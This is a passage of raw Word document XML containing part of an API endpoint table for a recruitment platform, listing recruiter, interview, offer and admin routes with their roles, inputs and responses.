              <w:t>CandidateProfileDto { headline, skills, years }</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>200 OK: Updated CandidateProfileDto</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>/api/recruiter/my-jobs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Recruiter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>None</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>200 OK: List&lt;RecruiterJobDto&gt; with applicant counts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>/api/recruiter/jobs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Recruiter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>JobCreateDto { title, description, skills, salary }</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>201 Created: Created Job record</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>/api/recruiter/jobs/{id}/applicants</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Recruiter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Path: jobId, ?stage=SHORTLISTED</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>200 OK: List&lt;ApplicantDto&gt; with match scores</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PUT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>/api/recruiter/applications/{id}/status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Recruiter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>{ status: 'SHORTLISTED' }</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>200 OK: Updated ApplicationDto</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>/api/recruiter/jobs/{id}/export-applicants</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Recruiter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Path: jobId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>200 OK: text/csv file stream</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>/api/interviews/schedule</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Recruiter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>InterviewScheduleDto { appId, date, url, round }</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>201 Created: InterviewDto</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>/api/offers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Recruiter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>OfferRequestDto { appId, salary, joiningDate }</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>201 Created: OfferDto</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>/api/admin/stats</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>None</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>200 OK: { totalUsers, totalJobs, totalApplications, totalOffers }</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>/api/admin/users</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>?page=0&amp;size=20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
